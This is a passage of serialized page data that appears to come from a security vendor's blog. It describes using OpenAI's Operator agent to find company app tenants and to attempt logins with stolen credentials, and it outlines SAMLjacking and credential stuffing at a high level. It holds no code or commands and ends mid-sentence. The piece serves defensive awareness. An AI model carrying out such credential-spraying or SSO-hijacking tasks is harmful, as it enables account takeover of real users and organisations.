attacks",{"url":142482},"https://images.ctfassets.net/y1cdw1ablpvd/stqRZBfjcRHW2gz3MBaIN/2679b191b6fa37bbe27b486b334bb7b8/Operator_clip_thumbnail__4_.jpg",{"items":142484},[142485,142487],{"sys":142486,"name":505},{"id":504},{"sys":142488,"name":26137},{"id":26136},{"json":142490,"links":142990},{"data":142491,"content":142492,"nodeType":165},{},[142493,142509,142515,142521,142527,142533,142536,142543,142559,142565,142586,142592,142598,142604,142609,142612,142619,142625,142631,142637,142642,142645,142652,142658,142664,142670,142675,142678,142685,142691,142697,142702,142707,142710,142717,142723,142728,142733,142739,142742,142749,142755,142761,142767,142773,142803,142812,142817,142823,142826,142833,142839,142849,142856,142862,142868,142874,142895,142911,142914,142921,142927,142942,142947,142950,142957,142963,142979,142984],{"data":142494,"content":142495,"nodeType":178},{},[142496,142499,142506],{"data":142497,"marks":142498,"value":138674,"nodeType":173},{},[],{"data":142500,"content":142501,"nodeType":186},{"uri":138677},[142502],{"data":142503,"marks":142504,"value":122317,"nodeType":173},{},[142505],{"type":194},{"data":142507,"marks":142508,"value":138686,"nodeType":173},{},[],{"data":142510,"content":142511,"nodeType":178},{},[142512],{"data":142513,"marks":142514,"value":138693,"nodeType":173},{},[],{"data":142516,"content":142517,"nodeType":178},{},[142518],{"data":142519,"marks":142520,"value":138700,"nodeType":173},{},[],{"data":142522,"content":142523,"nodeType":178},{},[142524],{"data":142525,"marks":142526,"value":138707,"nodeType":173},{},[],{"data":142528,"content":142529,"nodeType":178},{},[142530],{"data":142531,"marks":142532,"value":138714,"nodeType":173},{},[],{"data":142534,"content":142535,"nodeType":231},{},[],{"data":142537,"content":142538,"nodeType":169},{},[142539],{"data":142540,"marks":142541,"value":138725,"nodeType":173},{},[142542],{"type":370},{"data":142544,"content":142545,"nodeType":178},{},[142546,142549,142556],{"data":142547,"marks":142548,"value":138732,"nodeType":173},{},[],{"data":142550,"content":142551,"nodeType":186},{"uri":88239},[142552],{"data":142553,"marks":142554,"value":88245,"nodeType":173},{},[142555],{"type":194},{"data":142557,"marks":142558,"value":197,"nodeType":173},{},[],{"data":142560,"content":142561,"nodeType":178},{},[142562],{"data":142563,"marks":142564,"value":138749,"nodeType":173},{},[],{"data":142566,"content":142567,"nodeType":250},{},[142568,142577],{"data":142569,"content":142570,"nodeType":254},{},[142571],{"data":142572,"content":142573,"nodeType":178},{},[142574],{"data":142575,"marks":142576,"value":138762,"nodeType":173},{},[],{"data":142578,"content":142579,"nodeType":254},{},[142580],{"data":142581,"content":142582,"nodeType":178},{},[142583],{"data":142584,"marks":142585,"value":138772,"nodeType":173},{},[],{"data":142587,"content":142588,"nodeType":178},{},[142589],{"data":142590,"marks":142591,"value":138779,"nodeType":173},{},[],{"data":142593,"content":142594,"nodeType":178},{},[142595],{"data":142596,"marks":142597,"value":138786,"nodeType":173},{},[],{"data":142599,"content":142600,"nodeType":178},{},[142601],{"data":142602,"marks":142603,"value":138793,"nodeType":173},{},[],{"data":142605,"content":142608,"nodeType":312},{"target":142606},{"sys":142607},{"id":138798,"type":317,"linkType":318},[],{"data":142610,"content":142611,"nodeType":231},{},[],{"data":142613,"content":142614,"nodeType":169},{},[142615],{"data":142616,"marks":142617,"value":138810,"nodeType":173},{},[142618],{"type":370},{"data":142620,"content":142621,"nodeType":178},{},[142622],{"data":142623,"marks":142624,"value":138817,"nodeType":173},{},[],{"data":142626,"content":142627,"nodeType":178},{},[142628],{"data":142629,"marks":142630,"value":138824,"nodeType":173},{},[],{"data":142632,"content":142633,"nodeType":178},{},[142634],{"data":142635,"marks":142636,"value":138831,"nodeType":173},{},[],{"data":142638,"content":142641,"nodeType":312},{"target":142639},{"sys":142640},{"id":138836,"type":317,"linkType":318},[],{"data":142643,"content":142644,"nodeType":231},{},[],{"data":142646,"content":142647,"nodeType":169},{},[142648],{"data":142649,"marks":142650,"value":138848,"nodeType":173},{},[142651],{"type":370},{"data":142653,"content":142654,"nodeType":178},{},[142655],{"data":142656,"marks":142657,"value":138855,"nodeType":173},{},[],{"data":142659,"content":142660,"nodeType":178},{},[142661],{"data":142662,"marks":142663,"value":138862,"nodeType":173},{},[],{"data":142665,"content":142666,"nodeType":178},{},[142667],{"data":142668,"marks":142669,"value":138869,"nodeType":173},{},[],{"data":142671,"content":142674,"nodeType":312},{"target":142672},{"sys":142673},{"id":138874,"type":317,"linkType":318},[],{"data":142676,"content":142677,"nodeType":231},{},[],{"data":142679,"content":142680,"nodeType":169},{},[142681],{"data":142682,"marks":142683,"value":138886,"nodeType":173},{},[142684],{"type":370},{"data":142686,"content":142687,"nodeType":178},{},[142688],{"data":142689,"marks":142690,"value":138893,"nodeType":173},{},[],{"data":142692,"content":142693,"nodeType":178},{},[142694],{"data":142695,"marks":142696,"value":138900,"nodeType":173},{},[],{"data":142698,"content":142701,"nodeType":312},{"target":142699},{"sys":142700},{"id":138905,"type":317,"linkType":318},[],{"data":142703,"content":142706,"nodeType":312},{"target":142704},{"sys":142705},{"id":138911,"type":317,"linkType":318},[],{"data":142708,"content":142709,"nodeType":231},{},[],{"data":142711,"content":142712,"nodeType":169},{},[142713],{"data":142714,"marks":142715,"value":138923,"nodeType":173},{},[142716],{"type":370},{"data":142718,"content":142719,"nodeType":178},{},[142720],{"data":142721,"marks":142722,"value":138930,"nodeType":173},{},[],{"data":142724,"content":142727,"nodeType":312},{"target":142725},{"sys":142726},{"id":138935,"type":317,"linkType":318},[],{"data":142729,"content":142732,"nodeType":312},{"target":142730},{"sys":142731},{"id":138941,"type":317,"linkType":318},[],{"data":142734,"content":142735,"nodeType":178},{},[142736],{"data":142737,"marks":142738,"value":138949,"nodeType":173},{},[],{"data":142740,"content":142741,"nodeType":231},{},[],{"data":142743,"content":142744,"nodeType":169},{},[142745],{"data":142746,"marks":142747,"value":138960,"nodeType":173},{},[142748],{"type":370},{"data":142750,"content":142751,"nodeType":178},{},[142752],{"data":142753,"marks":142754,"value":138967,"nodeType":173},{},[],{"data":142756,"content":142757,"nodeType":178},{},[142758],{"data":142759,"marks":142760,"value":138974,"nodeType":173},{},[],{"data":142762,"content":142763,"nodeType":178},{},[142764],{"data":142765,"marks":142766,"value":138981,"nodeType":173},{},[],{"data":142768,"content":142769,"nodeType":178},{},[142770],{"data":142771,"marks":142772,"value":138988,"nodeType":173},{},[],{"data":142774,"content":142775,"nodeType":250},{},[142776,142785,142794],{"data":142777,"content":142778,"nodeType":254},{},[142779],{"data":142780,"content":142781,"nodeType":178},{},[142782],{"data":142783,"marks":142784,"value":139001,"nodeType":173},{},[],{"data":142786,"content":142787,"nodeType":254},{},[142788],{"data":142789,"content":142790,"nodeType":178},{},[142791],{"data":142792,"marks":142793,"value":139011,"nodeType":173},{},[],{"data":142795,"content":142796,"nodeType":254},{},[142797],{"data":142798,"content":142799,"nodeType":178},{},[142800],{"data":142801,"marks":142802,"value":139021,"nodeType":173},{},[],{"data":142804,"content":142805,"nodeType":178},{},[142806,142809],{"data":142807,"marks":142808,"value":139028,"nodeType":173},{},[],{"data":142810,"marks":142811,"value":139032,"nodeType":173},{},[],{"data":142813,"content":142816,"nodeType":312},{"target":142814},{"sys":142815},{"id":139037,"type":317,"linkType":318},[],{"data":142818,"content":142819,"nodeType":178},{},[142820],{"data":142821,"marks":142822,"value":139045,"nodeType":173},{},[],{"data":142824,"content":142825,"nodeType":231},{},[],{"data":142827,"content":142828,"nodeType":169},{},[142829],{"data":142830,"marks":142831,"value":139056,"nodeType":173},{},[142832],{"type":370},{"data":142834,"content":142835,"nodeType":178},{},[142836],{"data":142837,"marks":142838,"value":139063,"nodeType":173},{},[],{"data":142840,"content":142841,"nodeType":178},{},[142842,142845],{"data":142843,"marks":142844,"value":139070,"nodeType":173},{},[],{"data":142846,"marks":142847,"value":139075,"nodeType":173},{},[142848],{"type":370},{"data":142850,"content":142851,"nodeType":235},{},[142852],{"data":142853,"marks":142854,"value":139083,"nodeType":173},{},[142855],{"type":370},{"data":142857,"content":142858,"nodeType":178},{},[142859],{"data":142860,"marks":142861,"value":139090,"nodeType":173},{},[],{"data":142863,"content":142864,"nodeType":178},{},[142865],{"data":142866,"marks":142867,"value":139097,"nodeType":173},{},[],{"data":142869,"content":142870,"nodeType":178},{},[142871],{"data":142872,"marks":142873,"value":139104,"nodeType":173},{},[],{"data":142875,"content":142876,"nodeType":250},{},[142877,142886],{"data":142878,"content":142879,"nodeType":254},{},[142880],{"data":142881,"content":142882,"nodeType":178},{},[142883],{"data":142884,"marks":142885,"value":139117,"nodeType":173},{},[],{"data":142887,"content":142888,"nodeType":254},{},[142889],{"data":142890,"content":142891,"nodeType":178},{},[142892],{"data":142893,"marks":142894,"value":139127,"nodeType":173},{},[],{"data":142896,"content":142897,"nodeType":3769},{},[142898],{"data":142899,"content":142900,"nodeType":178},{},[142901,142904,142908],{"data":142902,"marks":142903,"value":139137,"nodeType":173},{},[],{"data":142905,"marks":142906,"value":139142,"nodeType":173},{},[142907],{"type":370},{"data":142909,"marks":142910,"value":139146,"nodeType":173},{},[],{"data":142912,"content":142913,"nodeType":231},{},[],{"data":142915,"content":142916,"nodeType":169},{},[142917],{"data":142918,"marks":142919,"value":129171,"nodeType":173},{},[142920],{"type":370},{"data":142922,"content":142923,"nodeType":178},{},[142924],{"data":142925,"marks":142926,"value":139163,"nodeType":173},{},[],{"data":142928,"content":142929,"nodeType":178},{},[142930,142933,142939],{"data":142931,"marks":142932,"value":139170,"nodeType":173},{},[],{"data":142934,"content":142935,"nodeType":186},{"uri":139173},[142936],{"data":142937,"marks":142938,"value":139178,"nodeType":173},{},[],{"data":142940,"marks":142941,"value":197,"nodeType":173},{},[],{"data":142943,"content":142946,"nodeType":312},{"target":142944},{"sys":142945},{"id":139186,"type":317,"linkType":318},[],{"data":142948,"content":142949,"nodeType":231},{},[],{"data":142951,"content":142952,"nodeType":169},{},[142953],{"data":142954,"marks":142955,"value":139198,"nodeType":173},{},[142956],{"type":370},{"data":142958,"content":142959,"nodeType":178},{},[142960],{"data":142961,"marks":142962,"value":139205,"nodeType":173},{},[],{"data":142964,"content":142965,"nodeType":178},{},[142966,142969,142976],{"data":142967,"marks":142968,"value":37,"nodeType":173},{},[],{"data":142970,"content":142971,"nodeType":186},{"uri":473},[142972],{"data":142973,"marks":142974,"value":93499,"nodeType":173},{},[142975],{"type":194},{"data":142977,"marks":142978,"value":139222,"nodeType":173},{},[],{"data":142980,"content":142983,"nodeType":312},{"target":142981},{"sys":142982},{"id":138798,"type":317,"linkType":318},[],{"data":142985,"content":142986,"nodeType":178},{},[142987],{"data":142988,"marks":142989,"value":37,"nodeType":173},{},[],{"entries":142991},{"hyperlink":142992,"inline":142993,"block":142994},[],[],[142995,143000,143004,143008,143043,143047,143072,143076,143080],{"sys":142996,"__typename":15269,"type":15270,"ctaText":142997,"buttonLabel":142998,"buttonColour":72847,"buttonUrl":142999},{"id":138798},"See our latest webinar on demand where we explore Operator's malicious use-cases throughout the kill chain","Watch Now","https://pushsecurity.com/resources/automating-identity-attacks",{"sys":143001,"__typename":5434,"title":143002,"arcadeDemoUrl":143003,"playText":27947},{"id":138836},"CUA blog — Arcade 1","https://demo.arcade.software/buNBQ1B8KBs44JUuKM3R?embed",{"sys":143005,"__typename":5434,"title":143006,"arcadeDemoUrl":143007,"playText":5437},{"id":138874},"CUA blog — Arcade 2","https://demo.arcade.software/b4EQ6eEkUvUMF6mXZoek?embed",{"sys":143009,"__typename":5311,"content":143010,"name":143042,"title":118},{"id":138905},{"json":143011},{"nodeType":165,"data":143012,"content":143013},{},[143014],{"nodeType":178,"data":143015,"content":143016},{},[143017,143021,143029,143033,143039],{"nodeType":173,"value":143018,"marks":143019,"data":143020},"Most apps provide ",[],{},{"nodeType":186,"data":143022,"content":143023},{"uri":27564},[143024],{"nodeType":173,"value":143025,"marks":143026,"data":143028},"extremely limited account and authentication method visibility to admins",[143027],{"type":194},{},{"nodeType":173,"value":143030,"marks":143031,"data":143032},", and even fewer give them the ability to make changes on behalf of the user like removing insecure login methods — meaning it’s very difficult for them to investigate and remediate ",[],{},{"nodeType":186,"data":143034,"content":143035},{"uri":832},[143036],{"nodeType":173,"value":835,"marks":143037,"data":143038},[],{},{"nodeType":173,"value":1477,"marks":143040,"data":143041},[],{},"CUA blog — Insight box 1",{"sys":143044,"__typename":5434,"title":143045,"arcadeDemoUrl":143046,"playText":27947},{"id":138911},"CUA blog — Arcade 3","https://demo.arcade.software/uuIiTlrp7eLN2cuPAEFB?embed",{"sys":143048,"__typename":5311,"content":143049,"name":143071,"title":118},{"id":138935},{"json":143050},{"nodeType":165,"data":143051,"content":143052},{},[143053],{"nodeType":178,"data":143054,"content":143055},{},[143056,143060,143068],{"nodeType":173,"value":143057,"marks":143058,"data":143059},"SAMLjacking works by modifying the app’s SAML settings to direct users to authenticate via an attacker-controlled SAML server to sign in using SSO via their IdP account. The user notices no real change to their experience and can access the resources as normal, but the attacker will harvest the credentials of every user that logs in. ",[],{},{"nodeType":186,"data":143061,"content":143062},{"uri":70029},[143063],{"nodeType":173,"value":143064,"marks":143065,"data":143067},"Find out more about SAMLjacking here",[143066],{"type":194},{},{"nodeType":173,"value":1477,"marks":143069,"data":143070},[],{},"CUA blog — Insight box 2",{"sys":143073,"__typename":5434,"title":143074,"arcadeDemoUrl":143075,"playText":15224},{"id":138941},"CUA blog — Arcade 4","https://demo.arcade.software/hnx017VaUdp9GGdzX8Yy?embed",{"sys":143077,"__typename":5434,"title":143078,"arcadeDemoUrl":143079,"playText":27947},{"id":139037},"CUA blog — Arcade 5","https://demo.arcade.software/VvkWBYKmBAm7r9qE64A3?embed",{"sys":143081,"__typename":15269,"type":15270,"ctaText":143082,"buttonLabel":143083,"buttonColour":72847,"buttonUrl":139173},{"id":139186},"Check out our blog post analysing the impact of CUAs on credential stuffing attacks","Read Now",{"items":143085},[143086,143688,144320],{"__typename":1528,"sys":143087,"content":143089,"title":143675,"synopsis":143676,"hashTags":118,"publishedDate":83753,"slug":143677,"tagsCollection":143678,"authorsCollection":143684},{"id":143088},"hpHG3MIyOo5AMxoeLDeBX",{"json":143090},{"nodeType":165,"data":143091,"content":143092},{},[143093,143101,143117,143146,143153,143156,143164,143171,143179,143186,143193,143200,143207,143215,143222,143251,143278,143285,143293,143300,143323,143330,143333,143341,143348,143356,143375,143408,143415,143427,143434,143442,143449,143456,143463,143470,143473,143481,143488,143511,143517,143520,143528,143544,143551,143554,143562,143569,143585,143592,143620,143623,143629,143646,143664,143669],{"nodeType":169,"data":143094,"content":143095},{},[143096],{"nodeType":173,"value":143097,"marks":143098,"data":143100},"Stolen credentials: The cyber criminal’s weapon of choice in 2024",[143099],{"type":370},{},{"nodeType":178,"data":143102,"content":143103},{},[143104,143107,143114],{"nodeType":173,"value":37,"marks":143105,"data":143106},[],{},{"nodeType":186,"data":143108,"content":143109},{"uri":1297},[143110],{"nodeType":173,"value":77246,"marks":143111,"data":143113},[143112],{"type":194},{},{"nodeType":173,"value":77250,"marks":143115,"data":143116},[],{},{"nodeType":178,"data":143118,"content":143119},{},[143120,143124,143132,143135,143142],{"nodeType":173,"value":143121,"marks":143122,"data":143123},"The criminal marketplace for stolen credentials is benefitting from ",[],{},{"nodeType":186,"data":143125,"content":143126},{"uri":77262},[143127],{"nodeType":173,"value":143128,"marks":143129,"data":143131},"the publicity of high profile breaches in 2024",[143130],{"type":194},{},{"nodeType":173,"value":77269,"marks":143133,"data":143134},[],{},{"nodeType":186,"data":143136,"content":143137},{"uri":819},[143138],{"nodeType":173,"value":27706,"marks":143139,"data":143141},[143140],{"type":194},{},{"nodeType":173,"value":143143,"marks":143144,"data":143145}," customers using credentials found in data breach dumps and compromised credential feeds from infostealer and mass phishing campaigns, resulting in the compromise of 165 customer tenants and hundreds of millions of breached personal records.",[],{},{"nodeType":178,"data":143147,"content":143148},{},[143149],{"nodeType":173,"value":143150,"marks":143151,"data":143152},"But despite 2024 being an unprecedented year in terms of the impact of identity-based attacks, there’s still a lot of unfulfilled potential for attackers to realize. ",[],{},{"nodeType":231,"data":143154,"content":143155},{},[],{"nodeType":169,"data":143157,"content":143158},{},[143159],{"nodeType":173,"value":143160,"marks":143161,"data":143163},"Credential attack automation — what’s changed with the shift to SaaS? ",[143162],{"type":370},{},{"nodeType":178,"data":143165,"content":143166},{},[143167],{"nodeType":173,"value":143168,"marks":143169,"data":143170},"Brute forcing and credential stuffing are nothing new, and have been a key component of the cyber attacker toolkit for decades. But it’s not quite as easy to automatically spray credentials across systems as it once was. ",[],{},{"nodeType":235,"data":143172,"content":143173},{},[143174],{"nodeType":173,"value":143175,"marks":143176,"data":143178},"No more one-size-fits-all",[143177],{"type":370},{},{"nodeType":178,"data":143180,"content":143181},{},[143182],{"nodeType":173,"value":143183,"marks":143184,"data":143185},"Rather than a single centralized network with apps and data contained within an infrastructure perimeter, business IT is now formed of hundreds of web-based apps and platforms, creating thousands of identities per organization.  ",[],{},{"nodeType":178,"data":143187,"content":143188},{},[143189],{"nodeType":173,"value":143190,"marks":143191,"data":143192},"This means that identities too are now decentralized and distributed all over the internet, as opposed to being stored solely in identity systems like Active Directory, and implemented using common protocols and mechanisms. ",[],{},{"nodeType":178,"data":143194,"content":143195},{},[143196],{"nodeType":173,"value":143197,"marks":143198,"data":143199},"While HTTP(S) is standard, modern web apps are complex and highly customized, with a graphically-driven interface that is different every time. And to make matters worse, modern web apps are specifically designed to prevent malicious automation through bot protections like CAPTCHA. ",[],{},{"nodeType":178,"data":143201,"content":143202},{},[143203],{"nodeType":173,"value":143204,"marks":143205,"data":143206},"So rather than encountering standard protocols and being able to write a single set of tools to use across any organization/environment e.g. write a DNS scanner once, use a single port scanner like Nmap for the entire internet, write a single script per service (e.g. FTP, SSH, Telnet, etc.) for your password sprayer — custom tool development is instead required for every app that you want to target. ",[],{},{"nodeType":235,"data":143208,"content":143209},{},[143210],{"nodeType":173,"value":143211,"marks":143212,"data":143214},"Finding the needle in the haystack",[143213],{"type":370},{},{"nodeType":178,"data":143216,"content":143217},{},[143218],{"nodeType":173,"value":143219,"marks":143220,"data":143221},"Not only are there more environments for attackers to include in the scope of their attack, but there are more credentials to work with. ",[],{},{"nodeType":178,"data":143223,"content":143224},{},[143225,143229,143234,143238,143247],{"nodeType":173,"value":143226,"marks":143227,"data":143228},"There are around ",[],{},{"nodeType":173,"value":143230,"marks":143231,"data":143233},"15 billion compromised credentials",[143232],{"type":370},{},{"nodeType":173,"value":143235,"marks":143236,"data":143237}," available on the public internet, not including those found only in private channels/feeds. This list is growing all of the time — ",[],{},{"nodeType":186,"data":143239,"content":143241},{"uri":143240},"https://www.bleepingcomputer.com/news/security/have-i-been-pwned-adds-284m-accounts-stolen-by-infostealer-malware/",[143242],{"nodeType":173,"value":143243,"marks":143244,"data":143246},"like 244M never before seen passwords and 493M unique website and email address pairs",[143245],{"type":194},{},{"nodeType":173,"value":143248,"marks":143249,"data":143250}," being added to Have I Been Pwned from infostealer logs just last month. ",[],{},{"nodeType":178,"data":143252,"content":143253},{},[143254,143258,143266,143270,143275],{"nodeType":173,"value":143255,"marks":143256,"data":143257},"This sounds scary, but it’s tricky for attackers to harness this data. The vast majority of these credentials are old and invalid. Our ",[],{},{"nodeType":186,"data":143259,"content":143260},{"uri":62639},[143261],{"nodeType":173,"value":143262,"marks":143263,"data":143265},"recent review of TI data",[143264],{"type":194},{},{"nodeType":173,"value":143267,"marks":143268,"data":143269}," found that fewer than 1% of stolen credentials included in threat intelligence feeds from a multi-vendor data set was actionable —",[],{},{"nodeType":173,"value":143271,"marks":143272,"data":143274}," in other words, 99% of compromised credentials were false positives.",[143273],{"type":370},{},{"nodeType":173,"value":10557,"marks":143276,"data":143277},[],{},{"nodeType":178,"data":143279,"content":143280},{},[143281],{"nodeType":173,"value":143282,"marks":143283,"data":143284},"But not all of them are useless — as the Snowflake attacks demonstrated, which successfully leveraged credentials dating back to 2020. So there are clearly treasures waiting to be discovered by attackers. ",[],{},{"nodeType":235,"data":143286,"content":143287},{},[143288],{"nodeType":173,"value":143289,"marks":143290,"data":143292},"Attackers are forced to prioritize",[143291],{"type":370},{},{"nodeType":178,"data":143294,"content":143295},{},[143296],{"nodeType":173,"value":143297,"marks":143298,"data":143299},"The distributed nature of apps and identities, and the low reliability of compromised credential data, means attackers are forced to prioritize — despite a target-rich environment of hundreds of business apps, creating thousands of sprawled identities per organization, because: ",[],{},{"nodeType":250,"data":143301,"content":143302},{},[143303,143313],{"nodeType":254,"data":143304,"content":143305},{},[143306],{"nodeType":178,"data":143307,"content":143308},{},[143309],{"nodeType":173,"value":143310,"marks":143311,"data":143312},"Writing and running custom python scripts for every single app (there are more than 40k SaaS apps on the internet) is not realistic. Even if you did the top 100 or 1000, that would be a significant task and require constant maintenance, while barely scratching the surface of the total opportunity. ",[],{},{"nodeType":254,"data":143314,"content":143315},{},[143316],{"nodeType":178,"data":143317,"content":143318},{},[143319],{"nodeType":173,"value":143320,"marks":143321,"data":143322},"Even when fully scripted and using a botnet to distribute the attack and avoid IP blocking, controls like rate limiting, CAPTCHA, and account lockouts can obstruct mass credential stuffing against a single app. And a concentrated attack on a single site is going to generate significant levels of traffic if you want to get through 15 billion passwords in a reasonable timeframe, so it’s very likely to raise the alarm.",[],{},{"nodeType":178,"data":143324,"content":143325},{},[143326],{"nodeType":173,"value":143327,"marks":143328,"data":143329},"So attackers tend to target a smaller number of apps, and only look for a direct match in terms of the credentials attempted (e.g. the stolen credential must directly belong to an account on the target app). When they do go after something new, it tends to be concentrated on a specific app/platform (e.g. Snowflake) or looking for a narrower subset of credentials (e.g. credentials clearly associated with edge devices, for more traditional network environments). ",[],{},{"nodeType":231,"data":143331,"content":143332},{},[],{"nodeType":169,"data":143334,"content":143335},{},[143336],{"nodeType":173,"value":143337,"marks":143338,"data":143340},"A missed opportunity?",[143339],{"type":370},{},{"nodeType":178,"data":143342,"content":143343},{},[143344],{"nodeType":173,"value":143345,"marks":143346,"data":143347},"As we’ve established, the situation regarding credential stuffing attacks is already pretty bad despite these limitations. But things could be significantly worse. ",[],{},{"nodeType":235,"data":143349,"content":143350},{},[143351],{"nodeType":173,"value":143352,"marks":143353,"data":143355},"Password reuse means a single compromised account could turn into many",[143354],{"type":370},{},{"nodeType":178,"data":143357,"content":143358},{},[143359,143363,143371],{"nodeType":173,"value":143360,"marks":143361,"data":143362},"If attackers were able to increase the scale of their attacks to target a broader number of apps (rather than concentrating on a shortlist of high value apps) they could take advantage of all-too-common password reuse. According to our ",[],{},{"nodeType":186,"data":143364,"content":143365},{"uri":4492},[143366],{"nodeType":173,"value":143367,"marks":143368,"data":143370},"recent investigation of identity data",[143369],{"type":194},{},{"nodeType":173,"value":143372,"marks":143373,"data":143374},", on average:",[],{},{"nodeType":250,"data":143376,"content":143377},{},[143378,143388,143398],{"nodeType":254,"data":143379,"content":143380},{},[143381],{"nodeType":178,"data":143382,"content":143383},{},[143384],{"nodeType":173,"value":143385,"marks":143386,"data":143387},"1 in 3 employees reuse passwords",[],{},{"nodeType":254,"data":143389,"content":143390},{},[143391],{"nodeType":178,"data":143392,"content":143393},{},[143394],{"nodeType":173,"value":143395,"marks":143396,"data":143397},"9% of identities have a reused password AND no MFA",[],{},{"nodeType":254,"data":143399,"content":143400},{},[143401],{"nodeType":178,"data":143402,"content":143403},{},[143404],{"nodeType":173,"value":143405,"marks":143406,"data":143407},"10% of IdP accounts (used for SSO) have a non-unique password",[],{},{"nodeType":178,"data":143409,"content":143410},{},[143411],{"nodeType":173,"value":143412,"marks":143413,"data":143414},"What does this mean? If a stolen credential is valid, there’s a good chance that it can be used to access more than one account, on more than one app (at least). ",[],{},{"nodeType":178,"data":143416,"content":143417},{},[143418,143423],{"nodeType":173,"value":143419,"marks":143420,"data":143422},"Picture the scenario:",[143421],{"type":370},{},{"nodeType":173,"value":143424,"marks":143425,"data":143426}," A recent compromised credential leak from infostealer infections or credential phishing campaigns shows that a particular username and password combination is valid on a specific app — let’s say Microsoft 365. Now, this account is pretty locked down — not only does it have MFA, but there are conditional access policies in place restricting the IP/location it can be accessed from. ",[],{},{"nodeType":178,"data":143428,"content":143429},{},[143430],{"nodeType":173,"value":143431,"marks":143432,"data":143433},"Usually, this is where the attack would end, and you’d turn your attention to something else. But what if you were able to spray these credentials across every other business app that the user has an account on?",[],{},{"nodeType":235,"data":143435,"content":143436},{},[143437],{"nodeType":173,"value":143438,"marks":143439,"data":143441},"Scaling credential attacks with Computer-Using Agents",[143440],{"type":370},{},{"nodeType":178,"data":143443,"content":143444},{},[143445],{"nodeType":173,"value":143446,"marks":143447,"data":143448},"Until now, the impact of AI on identity attacks has been limited to the use of LLMs for the creation of phishing emails, in AI-assisted malware development, and for social media bots — no doubt significant, but not exactly transformative, and requiring constant human oversight and input. ",[],{},{"nodeType":178,"data":143450,"content":143451},{},[143452],{"nodeType":173,"value":143453,"marks":143454,"data":143455},"But with the launch of OpenAI Operator, a new kind of “Computer-Using Agent”, this could be about to change. ",[],{},{"nodeType":178,"data":143457,"content":143458},{},[143459],{"nodeType":173,"value":143460,"marks":143461,"data":143462},"Operator is trained on a specialist dataset and implemented in its own sandboxed browser, meaning it is able to perform common web tasks like a human — seeing and interacting with pages as a human would. ",[],{},{"nodeType":178,"data":143464,"content":143465},{},[143466],{"nodeType":173,"value":143467,"marks":143468,"data":143469},"Unlike other automated solutions, Operator requires no custom implementation or coding to be able to interact with new sites, making it a much more scalable option for attackers looking to target a broad sweep of sites/apps. ",[],{},{"nodeType":231,"data":143471,"content":143472},{},[],{"nodeType":169,"data":143474,"content":143475},{},[143476],{"nodeType":173,"value":143477,"marks":143478,"data":143480},"Demo: Using Operator to conduct credential stuffing attacks at scale",[143479],{"type":370},{},{"nodeType":178,"data":143482,"content":143483},{},[143484],{"nodeType":173,"value":143485,"marks":143486,"data":143487},"We put the malicious use-cases of Operator to the test, using it to:",[],{},{"nodeType":250,"data":143489,"content":143490},{},[143491,143501],{"nodeType":254,"data":143492,"content":143493},{},[143494],{"nodeType":178,"data":143495,"content":143496},{},[143497],{"nodeType":173,"value":143498,"marks":143499,"data":143500},"Identify which companies have an existing tenant on a list of apps",[],{},{"nodeType":254,"data":143502,"content":143503},{},[143504],{"nodeType":178,"data":143505,"content":143506},{},[143507],{"nodeType":173,"value":143508,"marks":143509,"data":143510},"Attempt to login to various app tenants with a provided username and password",[],{},{"nodeType":312,"data":143512,"content":143516},{"target":143513},{"sys":143514},{"id":143515,"type":317,"linkType":318},"moAA7jwcBmZMaqpmPva4w",[],{"nodeType":231,"data":143518,"content":143519},{},[],{"nodeType":169,"data":143521,"content":143522},{},[143523],{"nodeType":173,"value":143524,"marks":143525,"data":143527},"Impact summary",[143526],{"type":370},{},{"nodeType":178,"data":143529,"content":143530},{},[143531,143535,143540],{"nodeType":173,"value":143532,"marks":143533,"data":143534},"The results were pretty eye opening. Operator clearly demonstrated the ability to target a list of apps with compromised credentials and perform in-app actions. ",[],{},{"nodeType":173,"value":143536,"marks":143537,"data":143539},"Now think about this x10, x100, x10,000 …",[143538],{"type":370},{},{"nodeType":173,"value":143541,"marks":143542,"data":143543}," These are not complex tasks. But the value of CUAs Operator is not in tackling complexity, but scale. Imagine a world where you can orchestrate Operator windows via API and get it to execute these actions simultaneously (functionality that exists already for ChatGPT). ",[],{},{"nodeType":178,"data":143545,"content":143546},{},[143547],{"nodeType":173,"value":143548,"marks":143549,"data":143550},"But this is bigger than Operator — it’s about the direction of the technology. OpenAI may implement restrictions — better in-app guardrails, rate limits on the number of concurrent tasks and total usage, etc. But you can guarantee it won’t be the only CUA — it’s only a matter of time before similar products emerge (maybe even inherently malicious ones) making use of the same technology. ",[],{},{"nodeType":231,"data":143552,"content":143553},{},[],{"nodeType":169,"data":143555,"content":143556},{},[143557],{"nodeType":173,"value":143558,"marks":143559,"data":143561},"Final thoughts ",[143560],{"type":370},{},{"nodeType":178,"data":143563,"content":143564},{},[143565],{"nodeType":173,"value":143566,"marks":143567,"data":143568},"It’s still early days for CUA tech, but there’s a clear indication that an already severe security challenge could be made worse with this particular form of AI-driven automation. While the ability to target a broad set of apps has been previously beyond the scope of traditional automation, it’s about to become much more accessible to even low-skilled attackers (think: next gen script kiddies?). ",[],{},{"nodeType":178,"data":143570,"content":143571},{},[143572,143576,143581],{"nodeType":173,"value":143573,"marks":143574,"data":143575},"Another way to think about it is that it effectively gives a human attacker a fleet of low-level interns who don’t ",[],{},{"nodeType":173,"value":143577,"marks":143578,"data":143580},"quite",[143579],{"type":1646},{},{"nodeType":173,"value":143582,"marks":143583,"data":143584}," know what they’re doing, but can be instructed to perform specific, itemised tasks at scale with only the occasional check in — while you work on other, more complex tasks. So, a bit like a red team manager of AI bots. ",[],{},{"nodeType":178,"data":143586,"content":143587},{},[143588],{"nodeType":173,"value":143589,"marks":143590,"data":143591},"Operator means that attackers can leverage compromised credentials at-scale, take advantage of the vast numbers of vulnerable and misconfigured identities, and convert them into systemic breaches much more easily. In a way, it could make credential stuffing a bit more like it was before the shift to cloud apps — where you could spray thousands of credentials across your targets without needing custom development every time. ",[],{},{"nodeType":178,"data":143593,"content":143594},{},[143595,143599,143606,143609,143616],{"nodeType":173,"value":143596,"marks":143597,"data":143598},"Thankfully, no new anti-AI capabilities are required — but it’s more important than ever that organizations look to defend their identity attack surface and find and fix identity vulnerabilities before attackers can take advantage of them. To prevent stolen credentials being exploited, defenders need to be able ",[],{},{"nodeType":186,"data":143600,"content":143601},{"uri":62639},[143602],{"nodeType":173,"value":143603,"marks":143604,"data":143605},"to quickly identify where compromised credentials are being actively 